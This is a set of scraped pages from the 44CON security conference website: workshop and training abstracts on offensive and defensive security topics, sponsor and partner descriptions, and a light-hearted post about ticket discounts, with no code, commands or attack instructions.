          In this workshop we’ll go through how to use a number of PowerShell tools such as NtObjectManager (https://www.powershellgallery.com/packages/NtObjectManager) that I’ve written to help identify interesting attack surfaces and from that extracting information through reverse engineering to discover how they can be exploited. The workshop will also contain an overview of important areas of Windows internals as they relate to privilege escalation and how PowerShell can give you more a better understanding of how these internal features work together.

          Note this will be a 4 hr workshop rather than a 2 hr one.

          Orange is the new Hack: Introduction to Machine Learning with Orange

          Presented by: Philippe Arteau

          Analyzing large number of security alerts can be repetitive and tedious. To help cope with the growing complexity of systems, analysts can use machine learning algorithms and other data analysis concepts. By doing prediction, machine learning algorithm can help prioritize and even reduce the amount of manual work needed. Data analysis can also help gain a better understanding of our data.
          The workshop will introduce participants to the world of machine learning using the software Orange. A security-related scenario will be used for the hand-on exercises. For this scenario, a large dataset of vulnerabilities from web applications reported by a static analysis tool will be used. The dataset of vulnerabilities was enriched with key metadata that will help the algorithms. Some metadata will need transformation. Based on issues that were classified, it will be possible to predict which unclassified issues are likely to be actual vulnerabilities.
          The attendants will be able to apply the same principles to the dataset in other contexts such as malware classification, system alert classification, vulnerability management, etc.

          Breaking (All) Applications With Frida

          Presented by: Jay Harris

          Frida is a framework which allows us to inject JavaScript into running applications. This has made reverse engineering and modifying applications easier than ever. Although Frida has a large following amongst mobile application testers, Frida also supports desktop applications and with not much effort it is possible to profile, debug and patch code.

          This 2 hour workshop will go though the basics of using Frida on Linux and Android and through exercises and walkthroughs show how Frida can be used to rapidly reverse engineer applications to understand logic flow, dump secrets and bypass security controls.

          Although what we look at here is relevant to mobile applications, this is not a mobile hacking workshop (in fact, most exercises will take place on Linux binaries) but might be useful to mobile testers looking to take their security testing to the next level.

          Advanced Wireless Attacks Against Enterprise Networks

          Presented by: Gabriel Ryan

          This workshop will instruct attendees on how to carry out sophisticated wireless attacks against corporate infrastructure. Attendees will learn how to attack and gain access to WPA2-Enterprise networks, bypass network access controls, and perform replay attacks to gain administrative control over an Active Directory environment. External wireless adapters and networking hardware will be provided to all workshop attendees, and material learned in the lectures will be practiced within a realistic lab environment.

          Areas of focus include:

          • Wireless reconnaissance and target identification within a red team environment
          • Attacking and gaining entry to WPA2-EAP wireless networks
          • LLMNR/NBT-NS Poisoning
          • Firewall and NAC Evasion Using Indirect Wireless Pivots
          • MITM and SMB Relay Attacks
          • Downgrading modern SSL/TLS implementations using partial HSTS bypasses

          ARM IoT Firmware Emulation Workshop

          Presented by: Saumil Shah

          Learn how to build your own testing and debugging environment for analysing IoT firmware images. Bug hunting in IoT firmware requires access to debugging, instrumentation and reverse engineering tools.

          In this workshop, we shall learn how to extract firmware from a few ARM IoT devices, deploy the extracted filesystems on an ARM QEMU environment, and emulate the firmware as close to the original hardware environment as possible. We shall also learn how to intercept and emulate NVRAM access to faithfully reproduce the exact configuration available on the actual device. Participants are required to bring a laptop capable of running VMware Workstation/Fusion/Player. We shall distribute a virtual machine with ARM QEMU along with firmware images extracted on the spot from a few SoHo routers and IP Cameras.

          The methodology discussed in this workshop is put together from the author’s own beats. While we use ARM as the base platform, the same methodology can also work for MIPS or other embedded architectures.

          Length: 2 hours
          Skill level: Intermediate

          Developing Exploits with Scratch Workshop

          Presented by: Kevin Sheldrake and Tim Todd

          Scratch is a programming language and IDE targeted at teaching young children how to code. The environment is sprite-based with all code residing behind each of the sprites and the stage (background). It is particularly good at developing games not unlike the flash-based games of the 90s/00s. Typically, the Scratch environment is a sandbox limiting all actions to objects within its own world. With the offline version of Scratch v2, however, it is possible to load ‘experimental HTTP extensions’ that can introduce new blocks linked to python functions via a web service API.

          Using the experimental extensions, I have implemented a set of blocks that allow access to TCP/IP functions. With these blocks it is possible to fuzz and exploit vulnerable services on a network-accessible victim machine. As a demonstration I have developed a PoC for the web server running on Saumil Shah’s tinysploit (stack smash) plus PoCs for two echo servers I have added to it (stack smash and format string vulnerability).

          The aim of the workshop is for students to fuzz and develop exploits against (simple) vulnerable network services. Students will be provided with a Scratch environment (VM or bootable USB stick) plus a vulnerable VM to attack. Together we will fuzz and exploit two echo servers (stack smash and format string vulnerability) through interactive investigation in gdb and interactive development in Scratch. Students will then be encouraged to fuzz and develop an exploit against the vulnerable web server provided by tinysploit.

          Upon completion of the Scratch exploits, we will quickly cover how to achieve similar results directly with python.

          If you are new to penetration testing or have been around a while but have never developed your own exploit (maybe you don’t code so well in python or C, or maybe you aren’t comfortable with debugging in gdb) then this workshop will give you the skills to build exploits in Scratch and python and see how to apply this knowledge to more complicated environments.

          Sys Mon! Why yu nuh logging dat?

          Presented by: Charl van der Walt, Willem Mouton, Carl Morris and Wicus Ross

          Sysmon from Microsoft is a very powerful host-level tracing tool, which can assist in detecting advanced threats on your network. Its free with Windows and a native extension of the Windows stack. Sysmon performs system activity deep monitoring and logs high-confidence indicators of attacks and compromise, but in contrast to common Antivirus / HIDS solutions … its stable, mature, simple and FREE!

          • Sysmon can monitor lots of interesting activities, including:
          • Process creation (with full command line and hashes)
          • Process termination
          • Network connections
          • File creation timestamps changes
          • Driver/image loading
          • Remote thread creation
          • Raw disk access
          • Process memory access

          and more.

          Another cool technology – Windows Event Forwarding (WEF) – can then used to read the event log on a device and forward selected events to a Windows Event Collector (WEC) server.

          Put these two together, dump it into the SIEM, database or Elastic Stack of your choice, and you have yourself a pretty fine Windows Event monitoring and Threat Hunting platform.

          In this presentation we will introduce these powerful tools and show you how to implement WEF and deploy Sysmon using your existing AD infrastructure and Group Policy so there is minimal impact on resources, and how to remotely tune and improve the configuration as necessary.

          Win!

          So what then?

          We will then move on to explore how to extract ‘actionable’ intelligence from these logs – what to look for, how to spot it and what to do when you do find the mythical needle in the haystack, using real, practical examples from our own day-to-day operations.

          Finally, we will share in detail some of our experiment (failed and successful) with extracting even more value from these logs, for example:

          • Using Windows Event Logs via Sysmon to detect attacks on Web Applications
          • Performing Event Correlation by pulling Sysmon into MiSP
          • Using Python and scikit-learn to implement a semi supervised learning algorithm using a Markov chain random walk classifier to highlight anomalous events from large volumes of benign ones.

          Security module for php7 – Killing bugclasses and virtual-patching the rest!

          Presented by: Julien Voisin and Thibault Koechlin

          Suhosin is a great PHP module, but unfortunately, it’s getting old, new ways have been found to compromise PHP applications, and some aren’t working anymore; and it doesn’t play well with the shiny new PHP 7. As a secure web-hosting company, we needed a reliable and future-proof solution to address the flow of new vulnerabilities that are published every day. This is why we developed Snuffleupagus, a new (and open-source!) PHP security module, that provides several features that we needed: passively killing several PHP-specific bug classes, but also implementing virtual-patching at the PHP level, allowing to patch vulnerabilities in a precise, false-positive-free, ultra-low overhead way, without even touching the applications’ code.

          Source code: https://github.com/nbs-system/snuffleupagus

          Website: https://snuffleupagus.readthedocs.io/

          Twitter: https://twitter.com/sp_php

          Also check our list of Talks for 44CON 2018.

          %d bloggers like this:
          #####EOF##### 44CON 2016 Sponsors – 44CON

          44CON 2016 Sponsors

          sponsor_board

          Platinum Sponsor
          NCCG Logo [Spot]

          NCC Group

          www.nccgroup.trust

          NCC Group is a FTSE 250 listed global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape.

          With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face.

          We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.

          Headquartered in Manchester, UK, with over 30 offices across the world, NCC Group employs more than 1,850 people and is a trusted advisor to 15,000 clients worldwide.

           

          Gold Sponsors
          blue

          SecureWorks

          www.secureworks.com

          SecureWorks is a global provider of intelligence-driven information security solutions exclusively focused on protecting its clients from cyberattacks. SecureWorks’ solutions enable organisations to fortify their cyber defences to prevent security breaches, detect malicious activity in real time, prioritise and respond rapidly to security breaches and predict emerging threats.      

          BlackBerry_Logo_Preferred_White_R

          encription

          Blackberry

          www.blackberry.com

          BlackBerry is securing a connected world, delivering innovative solutions across the entire mobile ecosystem and beyond. We secure the world’s most sensitive data across all end points – from cars to smartphones – making the mobile-first enterprise vision a reality. Founded in 1984 and based in Waterloo, Ontario, BlackBerry operates offices in North America, Europe, Middle East and Africa, Asia Pacific and Latin America. The Company trades under the ticker symbols “BB” on the Toronto Stock Exchange and “BBRY” on the NASDAQ.

          For more information, visit www.BlackBerry.com.

           

          Infosec Alternative Icons - Simple orange no badge - orange security - rev-3a copy

           Amazon

          www.amazon.co.uk

          At Amazon, we are obsessed with customer trust. Information Security maintains this by guarding the confidentiality and integrity of Amazon and customer data. We assess risk, classify data and systems, detect potential intrusion, and render useless the value of data that may be leaked.

          Our teams span over 10 countries worldwide, and our focus areas include: security intelligence, application security, incident response, security operations, risk and compliance, acquisitions and subsidiaries, and external partner security. Our mission includes instilling awareness to safeguard all customer and employee data, applications, services, and assets. To accomplish this, we unite with Amazon organizations to build security best practices into enterprise-wide systems. Our guidance and leadership equip our partners to maintain high security standards.

          We’re hiring new security talent!

           

          Silver Sponsors
          cxt_logo_rgb

          Context

          www.contextis.com

          Context is an independently managed cyber security consultancy that employs some of the best in the industry, we work on prestigious projects for clients that include some of the world’s most high profile blue chip companies. Our consultants are passionate about the technical and commercial side of security services. Our broad service portfolio covers the areas of security penetration testing and assurance, incident response and investigations, and technical security research. We are certified by CESG and CPNI for the Cyber Incident Response scheme and we helped to establish CREST and its associated standards

          MOJ_Logo_transparent (1)

           Digital Justice

          mojdigital.blog.gov.uk

          The Ministry of Justice Digital and Technology team design, build and support digital services that make a real difference to people and their families using the justice system at some of the most difficult times of their lives.

          Last year we saw nearly 1 million people interact with our simple to use, effective digital services which are built around user needs. We continue to play a major part in improving access to justice and the services we build help make that experience considerably easier and less distressing.

          Our team make sure our 74,000 staff have the tools and technology they need to provide critical services which keep tribunals, courts and prisons operating effectively across 1800 sites.

          We are using digital, data and technology to build capability, work smarter and more efficiently while reducing costs. In the next 4 years we want to create a digitally enabled end-to-end justice system which can adapt and respond to changing needs.

          If you’re interested in joining our team, send your CV and a covering letter to: recruitment@digital.justice.gov.uk

           bt

           BT

          www.bt.com

          BT is one of the world’s leading providers of communications solutions and services operating in 170 countries. Its principal activities include networked IT services; local, national and international telecommunications services; higher-value broadband and internet products and services and converged fixed/mobile products and services.

          BT Security protects both BT and its corporate and government customers. To help these customers manage and maintain resilient networked IT infrastructures round the clock, 365 days a year, BT offers a full portfolio of security consulting and managed services, including secure networking, business continuity, and identity and access management services.

          To hear more from our security experts visit: www.bt.com/letstalk/security

           msft_logo

          Microsoft  

          www.microsoft.com

          Microsoft (Nasdaq “MSFT”) is the worldwide leader in software, services, and solutions that help people and businesses realize their full potential. Microsoft remains dedicated to software security and privacy and continues to collaborate with the community of people and technology organizations helping to protect customers and the broader ecosystem.

          Other Event Sponsors

          blackducklogo__blackcolor-copy

          Black Duck Software 

          www.blackducksoftware.com

          Organisations worldwide use Black Duck products to secure and manage open source software, eliminating pain related to open source security vulnerabilities and open source license compliance.We offer subscription-based software products and on-demand audit services.Founded in 2003 and headquartered in Burlington, MA, Black Duck is a privately held company with 200+ employees and more than 1,300 Customers.

          Our Products and Services:

          • Identify and inventory open source software used to build applications
          • Map to known vulnerabilities and license requirements through an automated process that compares the inventory of open source software against Black Duck’s comprehensive Knowledge Base, the National Vulnerability Database, VulnDB, and other databases 
          • Continuously monitor for and alert teams when new open source vulnerabilities that impact the inventoried software are discovered
          • Assist teams in remediation with robust orchestration and policy enforcement features

          Memset-logo-blue-bg

          Memset

          www.memset.com

          Memset provide highly secured, transparently priced and intelligently designed, UK-based Infrastructure-as-a-Service Cloud hosting to developers, businesses & government.

          Our secure cloud computing services offer outstanding performance and value, the highest security accreditations and the latest technology. All backed by meaningful, industry leading SLAs with 99.95% uptime and 24/7/365 UK-based support. Customers include HSBC, BBC, Boots, GDS, Cabinet Office, Home Office, University of Westminster and many more.

          unknown

          Thinkst Canaries 

          http://canary.tools

          Thinkst Canaries are deployed (and loved!) by companies all over the world. Canary allows you to deploy high quality, mixed interaction honeypots in under 4-minutes with almost zero management overhead. This means you can deploy them and forget about them, until you receive a single high quality alert that lets you know your other safeguards have failed. From Silicon Valley Unicorns to Australian Universities, from Multinational banks to small law firms, Canaries are keeping watch and blowing the whistle on otherwise undiscovered intrusions.

           

          Traditional methods of detection look for attacks, but most attackers look like regular users (not attackers!) – Canary turns your home-ground advantage into a simple, reliable method of revealing your attackers. Simple, reliable and proven world wide. Canary. Know when it matters.

           Nettitude - excellence as standard

          Nettitude

          www.nettitude.com

          Cyber Strategy is part of our DNA.

          Through our Define-Defend-Detect-Respond and Assure services, we enable our customers to enhance their security posture, reduce risk and improve their cyber security strategy for the longer term.We are an award winning global leader in the creation and development of cyber security strategy. We work closely with leadership teams and the board to help organisations gain situational awareness around their current cyber security posture. We conduct both paper based, and technology focused assessments to quantify organisations cyber security capabilities. Through a series of robust frameworks, we then define high level cyber security objectives that will move the organisation to a mode of operation that is aligned with their risk tolerance.

           Nettitude’s highly experienced consulting team is then able to support the organisation build their cyber security strategy, allowing for quantifiable measurements to take place to track progress towards the organisations overall goals. Nettitude’s team of testers hold the highest technical qualifications available and provide risk based, real world, human led testing services. This includes, penetration testing from the advanced techniques of Simulated Targeted Attack and Response (STAR) through to the broader assurances of Cyber Essentials, social engineering, red teaming exercises, and vulnerability assessments.

           checksec

           CheckSec

          https://checksec.com

          CheckSec are proud to be back at 44CON for another year! This year we will be bringing you Canopy 3, the next iteration of our security assessment management and reporting solution. Canopy 3 adds a number of major improvements and new features, including tracking the full assessment lifecycle: from opportunity through to report delivery.

           Tigerscheme-logo reg

           Tigerscheme 

          www.tigerscheme.org

          Twitter: @tiger_scheme

          Tigerscheme is a commercial certification scheme for technical security specialists, backed by University standards and covering a wide range of expertise.

          Tigerscheme was founded in 2007, on the principle that a commercial certification scheme run on independent lines would give buyers of security testing services confidence that they were hiring in a recognised and reputable company.

          Tigerscheme provides for career progression through entry level certification, intermediate level certification, and senior and technical specialist roles. Certification under Tigerscheme provides a formal recognition of an individual’s skills, and is awarded on the basis of a rigorous independent assessment against published and widely-accepted standards.

           pentest-partners

          Pen Test Partners  

          www.pentestpartners.com

          Pen Test Partners LLP is a CHECK & CREST accredited pen testing company that is approved by the PCI Council to undertake card breach work as a PCI PFI. We investigate roughly half of all credit card data breaches in the UK which provides us with excellent real-time threat intelligence, used to augment our testing. We are a limited liability partnership for a very good reason; being in a partnership means that our people are heavily invested the company. It’s that employee ownership which inspires and drives the quality in what we do.

           pt_logo-02

           Positive Technologies 

          www.ptsecurity.com

          Positive Technologies is a leading global provider of enterprise security solutions for vulnerability and compliance management, incident and threat analysis, and application protection. Commitment to clients and research has earned Positive Technologies a reputation as one of the foremost authorities on Industrial Control System, Banking, Telecom, Web Application, and ERP security, supported by recognition from the analyst community.

          Learn more about Positive Technologies at ptsecurity.com

          Event Partners
          Antipøde

          Antipøde

          http://www.blackandwhitecoffee.co.uk

          Having spent many years in Brisbane, Australia, behind the machines in a few of its most renowned coffee hangouts; Harvey’s (under chef PJ McMillan), Au Cirque and The Little Larder, it became quickly apparent after moving to London, that the city was crying out for the simple things in life, like a good flat white.

          Our Raison d’être is simple – to provide the London public with the quality and standards associated with Australian coffee culture.

          ESW Solutions

          ESW Solutions

          http://www.eswav.com

          Founded in 1995, ESW Solutions has quickly become a major force in the Audio Visual industry – building on its first class reputation for customer service, quality and commitment. From a large multi room European conference to a small meeting we have the experience to make your event successful. We also produce live events for a wide range of clients, Awards Ceremonies, Talent Competitions, Festival Stages etc.

          ESW is also the home to Talking Slides a unique product that gets content presented at your conference online and ready to view in a simple, cost-effective and hassle-free manner. We attend your event and capture the presentations as they happen. However, the recording of your event is just the beginning.

          We take the high-definition presentation recordings and host them within our Talking Slides management system, complete with search facilities, registration options and even pay-per-view access.

          #####EOF##### Hacking 44CON’s Pricing Model (5 Different Ways) – 44CON

          Hacking 44CON’s Pricing Model (5 Different Ways)

          Obligatory hacking photo

          It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?”

          Understanding Our Pricing

          Traditionally our ticket scheduling has gone Early Bird -> 44CON Standard Ticket. This year, our pricing is a little different. We now have:

          • Early Bird: £299
          • Standard Ticket: £349
          • On the door: £399

          You can buy a standard ticket here, but read on for our hacks.

          In addition to this we’ve run a free registration Wednesday night event. This year we’ve invited the ManyHats Club to run our Thursday night session, so our free registration ticket gets you in to both evenings instead of one. The free ticket also gets you into our CTF space so you can take part in the CTF. These tickets aren’t out yet, so keep an eye out on the socials and make sure you’re subscribed to our newsletter.

          We’ve also redesigned the main hall with more of an expo feel based on a village concept. This means we’re going to offer expo tickets that give you access to the hall. These tickets are only going to be available to certain groups and will be limited.

          Hack 1: Exploit Discounts

          We run discounts with groups such as the ISSA, OWASP and CREST. Please do use them, that’s what they’re there for. If you book a training course for any of our March, June or September 2019 training you’ll get a discount on tickets equivalent to Early Bird pricing up to but not including tickets bought on the day.

          Hack 2: Apply for Assistance

          Last year we ran an assistance programme for those who otherwise wouldn’t be able to come. We’ll do the same this year. Assistance tickets include full event entry and accommodation. It’s the cheapest way to get to 44CON. You’ll need to qualify for a ticket, and we haven’t yet launched 2019’s programme. It’ll probably launch in the late spring, so around May/June but it’s going to come down to this years’ sponsors, such as the awesome wire security.

          The criteria for this year’s assistance tickets are yet to be determined but we’re mainly focused on deprived areas of the UK outside London and people from economically disadvantaged backgrounds or situations.

          Hack 3: Apply to Join the Crew

          The crew work extremely hard to make 44CON what it is, but on the plus side there’s a lot of love amongst the crew. You’ll get to see some of the talks and, of course, you’re crew with all the crewdos that brings (Ouch – Adrian). If that sort of thing floats your boat, crew applications will be up later this year.

          Hack 4: Split a ticket

          We don’t track your identity while at the event. If your friend has a full ticket, you have an expo ticket and want to swap, then by all means feel free to swap tickets if there’s a particular talk you want to see. We just ask that you don’t abuse it – sharing with a couple of mates is fine. Sharing with heaps of randos, taking the mickey and selling access to talks is a violation of the house rules.

          Hack 5: Ask!

          If your hackerspace, hacking society or club would like a discount code, email us for one. This is really handy when used with Hack 4.

          If there’s something you’d like to run at 44CON inside the event, let us know. We have community spaces for groups like OWASP, the ISSA and CREST amongst others. Some of our sponsors are also looking for help on their stands. Keep an eye out for announcements on our mailing list and pounce when you get the chance.

          #####EOF##### Partners of 44CON – 44CON

          Partners of 44CON

           

          Conference Partners

          DeepSec

          https://deepsec.net

          Bringing together the world’s most renowned security professionals from academics, government, industry, and the underground hacking community.

          SteelCon

          https://www.steelcon.info/

          SteelCon is an event held in the North of England for anyone who is interested in how things work, how things can be broken and how they can be fixed. It’s for people who like to tinker with things, aren’t happy with something until they know how it does what it does and won’t let something be broken without trying to fix it. SteelCon 2018 took place on 3rd-8th of July and 44CON ran the soldering area, we hope you saw us there!

          HITB logo regular

          Hack in the Box

          http://conference.hitb.org/

          HITBSecConf or the Hack In The Box Security Conference is an annual must attend event in the calendars of security researchers and professionals around the world. Held annually in Kuala Lumpur, Malaysia and Amsterdam in The Netherlands, HITBSecConf is a platform for the discussion and dissemination of next generation computer security
          issues. Our events routinely feature two days of trainings and a two-day multi-track conference featuring cutting-edge hardcore technical talks delivered by some of the most respected names in the computer security industry. HITBSecConf is a place where ideas are exchanged, talent discovered and genius celebrated.

          SS_heads

          Suits & Spooks

          http://www.suitsandspooks.com

          Suits and Spooks London 2015 was held at the techUK facility in London. Following a fantastic event in 2014, Suits and Spooks London 2015 was our first 2-day international event. Speakers included Marina Litvinenko, the widow of the Russian FSB officer who was poisoned in London with radiation, EJ Hilbert of Kroll Associates, Zach Tumin of the NYPD, and many more. We’ll also have representatives from the British government speaking and in attendance, along with British Venture Capitalists and the usual mix of public and private sector participants.

          Media Partners
          ORM_logo_box_rgb

          O’Reilly

          http://www.oreilly.com/

          O’Reilly provides technology and business training, knowledge, and insight to help companies succeed in the face of huge economic and technological shifts confronting businesses today. Our unique network of security experts and innovators share their knowledge and expertise on the company’s comprehensive training and information platform and at the O’Reilly Security conference in New York.

          Community Partners
          bsides

          BSides London

          http://www.securitybsides.org.uk

          B-Sides London, Security B-Sides is a community-driven event built for and by information security community members.

          BSides London 2018 took took place on 6 June 2018 at the ILEC conference centre.

          BSidesAth_logo01_250x250
          crest-new

          CREST

          CREST is the not-for-profit accreditation and certification body representing the technical information security industry. CREST provides internationally recognised accreditation for organisations and individuals providing penetration testing, cyber incident response and threat intelligence services.

          All CREST Member Companies undergo regular and stringent assessment; while CREST qualified individuals have to pass rigorous examinations to demonstrate knowledge, skill and competence. CREST is governed by an elected executive board of experienced security professionals who also promote, develop and support awareness, ethics and standards within the cyber security marketplace.

          Follow us on Twitter: @crestadvocate

          44CON will be a community sponsor of CRESTCon 2019 that will take place on 14th March 2019 at the Royal College of Physicians in London.

          IISP logo high-res centered

           IISP

          The Institute of Information Security Professionals (IISP) is a not-for-profit organisation, owned by its members and dedicated to raising the standard of professionalism in information security and the industry as a whole. The IISP does this through accrediting skills and competence, by sharing best practice and by providing a network of support and guidance on individual skill development. It speaks with an authoritative voice and its competency based memberships are widely recognised in the information security industry.

          Working closely with the Information Security community, the IISP has a growing membership of over 2,600 individual members across private and government sectors, forty two Corporate Member Organisations and seventeen Academic Partners.

          At the heart of the Institute is the IISP Skills Framework©2012 which is widely accepted as the de facto standard for measuring competency of Information Security Professionals. CESG have taken this framework to underpin a range of certification schemes  including the Certified Professional Scheme (CCP), for which the IISP is the leading certifying body and to develop syllabuses for Masters Degrees. The skills framework is used extensively by our corporate members to benchmark and develop capability of their employees it has also been adopted by e-Skills UK to develop a National Occupational Standard for Information Security. The IISP also accredits  training courses offered by commercial training providers against the Institute’s Skills Framework. This enables attendees to build knowledge in areas of the skills framework where they might have gaps and to gain hands-on experience. 

          More information about the IISP and its work can be found at www.iisp.org.

          ISSA-UK

          ISSA-UK

          Welcome to ISSA-UK, the UK Chapter of the ISSA. With active participation from individuals and chapters all over the world, the Information Systems Security Association (ISSA) is the largest international, not-for-profit association specifically for information security professionals. Having welcomed over 1,800 members since our beginnings in 2003, the ISSA-UK Chapter is the world’s most successful chapter. At only $95 per year for membership, we offer the most value out of any security association globally.

          RawHex

          We break things so you don’t have to. We build things so you can do, too. Home of the HIDIOT, the little computer you can build yourself.

          OWASP

          The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions.

           

          #####EOF##### The Mobile Application Hacker’s Handbook: Live Edition – 44CON

          The Mobile Application Hacker’s Handbook: Live Edition

          Presented By: Razvan Sima, MDSec

          The course begins with a brief introduction to mobile application security and the OWASP mobile top ten, following chapter 1 of the book. When delegates are comfortable with general mobile application security practices, we delve in to the security of the iOS platform, including an overview of the platform security features, jailbreaking and approaches to app security assessment. Day two of the course picks up at chapter 6, discussing the various attack surfaces for the Android platform and how to approach an app assessment. We then walk through the details of techniques from chapter 7 and 8 that can be used to attack Android applications.

          The 2 day course will take place on the 10th & 11th September 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          During the course beginner and intermediate security researchers will learn basic skills as an introduction to mobile security assessments. Advanced topics will also be covered during the 2-day course including reverse engineering and runtime instrumentation. Key learning objectives can be summarised as follows:

          • The security protections on iOS and Android devices
          • How iOS and Android devices are jailbroken or rooted
          • How to quickly and efficiently pinpoint and exploit vulnerabilities in iOS and Android apps
          • How to decompile, reverse and patch iOS and Android apps
          • How to hack WebView’s, client-side databases and the keychain
          • Instrument application runtimes using Frida
          • How to intercept network traffic and bypass certificate pinning
          • Exploitation of IPC mechanisms including content providers, URL handlers, application extensions, broadcasts, activities and intents
          • Practical exploitation of poorly implemented cryptography
          • Bypass security controls such as root or jailbreak detection
          • Real-world techniques used to defeat real apps on iOS and Android
          • Knowledge of defensive and remedial advice

          Course Outline

          Day 1 – iOS:

          • Reverse engineering and patching binaries,
          • Insecure file storage,
          • Keychain attacks,
          • Insecure transport security,
          • Instrumenting the iOS runtime,
          • Injection attacks,
          • How to exploit IPC handlers,
          • How to defeat security controls like jailbreak detection,
          • Instrumentation on non-jailbroken devices.

          Day 2 – Android:

          • Reverse engineering and decompiling Android apps,
          • Insecure file storage,
          • Insecure transport security,
          • Instrumentation of the Dalvik and ART runtime with Frida,
          • Exploitation of insecure IPC endpoints,
          • App jacking.

          Target Audience

          This course is ideally suited for penetration testers or developers wanting to gain a foothold in to penetration testing mobile devices and mobile apps.

          Student Requirements

          A basic knowledge of programming and mobile security concepts is useful but not essential.

          What to Bring

          • Administrative access to a laptop with the ability to install a few tools, and disable personal firewalls or virus scanners should they get in the way of the lab exercises.
          • Laptop with the capability to connect to wireless and wired networks.
          • We recommend at least 8GB of RAM with at least 16GB of disk space free.

          Software Requirements

          Students require a player to run VirtualBox images. Instructions will be provided well ahead on how to setup the VM software and download the VM image.

          Students will be provided with

          • The training material in electronic format
          • A mobile hacking virtual machine, packed with all the tools to perform an assessment
          • Downloadable copies of the labs that they can take away and work on in the future
          • After course e-mail support

          About the Trainer

          Lead Instructor – Razvan Sima

          Razvan is head of mobile service line at MDSec and has been with the company for over 4 years. The MDSec team have provided training at conferences, security organisations and clients for the past 14 years. Our experienced team are renowned experts in the field of application security, backed by our leading publications the Mobile Application Hacker’s Handbook and the Web Application Hacker’s Handbook. Our penetration testing team have been responsible for thousands of assessments delivered to financial, government and retail organisations across the globe; let us share our experience with you.

          Book your 44CON 2019 training course now!

          #####EOF##### 44CON 2018 Schedule – 44CON
          %d bloggers like this:
          #####EOF##### 44CON CYBER SECURITY TRAINING 2016 – 44CON

          44CON CYBER SECURITY TRAINING 2016

          The below training courses will be run from 27th April 2016. We are hoping to hold the training in the same venue as 44CON Cyber Security; this will be confirmed at a later date.

          Presented by: Dawid Czagan

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join this unique hands-on training!

          Dawid Czagan will discuss security bugs that he has found together with Michal Bentkowski in a number of bug bounty programs (including Google, Yahoo, Mozilla, Twitter and others). You will learn how bug hunters think and how to hunt for security bugs effectively. To be successful in bug hunting, you need to go beyond automated scanners. If you are not afraid of going into detail and doing manual/semi-automated analysis, then this hands-on training is for you.

          Course Length: 2 days

          #####EOF##### 44CON 2013 Training – 44CON

          44CON 2013 Training

          Android Security Workshop

          MWR InfoSecurity

          The training course is designed for:

          • Android developers who have a basic understanding of Android security but wish to improve their knowledge about the options available to them in more unusual or difficult situations. The workshop will present them with opportunities to see mistakes made by others, witness and recreate exploits and to redesign and secure vulnerable functions under supervision.
          • Android security testers with basic understanding of Java and Android pen-testing. The workshop will give them the opportunity to see difficult to solve security issues, develop tests to locate the issues and write exploits against them.

          The training course will teach attendees about the implementation details of the Google Android operating system (OS), the impact this has on the security posture of custom applications and the Google Android device.

          Course Length: 2 days


          The Web Application Hacker’s Handbook, 2nd Edition: LIVE!

          MDSec (Marcus Pinto)

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days


          The Advanced Exploit Laboratory

          Saumil Shah

          The Advanced Exploit Laboratory is an all new intermediate to advanced level class, for those curious to dig deeper into the art and craft of software exploitation. We begin with a quick overview of stack overflows, exception handler abuse, memory overwrites, and other core concepts. The class then moves on to use-after-free bugs and vtable overwrites, especially applicable to browser and PDF exploits. The class also spends a lot of time focusing on defeating modern day exploit mitigation techniques like DEP and ASLR using Return Oriented Programming (ROP).

          To add extra punch, we are introducing an all new section practical exploitation of browsers on the Android platform and working with ARM exploits. This is one class you don’t want to miss!

          The Exploit Laboratory requires a lot of hands on work. Lab examples used in this class cover Linux, Windows and Android platforms, featuring popular third party applications and products instead of simulated lab exercises.

          As with the popular Exploit Laboratory, all topics are delivered in a down-to-earth, learn-by-example methodology. The same trainers who brought you The Exploit Laboratory for over eight years have been working hard in putting together advanced material based on past feedback.

          Course Length: 2 days

          This is the 100% genuine Exploit Lab! No imitations, no rip-offs


          Hacking by Numbers – Mobile Edition

          SensePost

          Mobile phone usage continues to grow at an outstanding rate, with mobile applications an increasingly common development target. This course will teach how to go about testing mobile platforms, and installed applications to ensure they have been developed in a secure manner.

          Hacking By Numbers Mobile will give you a practical window into the methods used when attacking mobile platforms. This course is ideal for penetration testers/auditors/developers who are new to the mobile area and need to understand how to analyse and audit applications on various mobile platforms using a variety of tools and platforms. This course uses a mixture of lectures, hands-on-labs, demonstrations and group exercises. You’ll tear apart 10 mobile applications looking for flaws and exploiting them.

          This is a new course in the Hacking By Numbers series and one we are incredibly excited about.

          Course Length: 2 days

          #####EOF##### Share a link on Twitter

          Share a link with your followers

          New to Twitter?

          Get instant updates from your friends, industry experts, favourite celebrities, and what's happening around the world.

          What is Twitter? Learn more.

          #####EOF##### DSC_5229-1 – 44CON

          DSC_5229-1

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Create New Account
          #####EOF##### 44CON – Page 3

          SteelCon2018 Tickets up for Grabs!

          Ey up, We’ve got two SteelCon 2018 Tickets to give away. Make like a whippet and you too could be at Sheffield’s finest hacker conference!

          Nah then, 44CON will be exhibiting at SteelCon in July 2018. We’re also running a soldering area and have stickers and reyt good goodies to grab! Even better, we have two tickets to give away! As lovely as it is, Sheffield is uphill both ways in the snow. If you’re heading up from that London, make sure you wrap up warm.

          How to enter:

          For a chance to win one of two SteelCon 2018 tickets all you have to do is this before the 31st of May 2018:

          1. Purchase a 44CON 2018 ticket
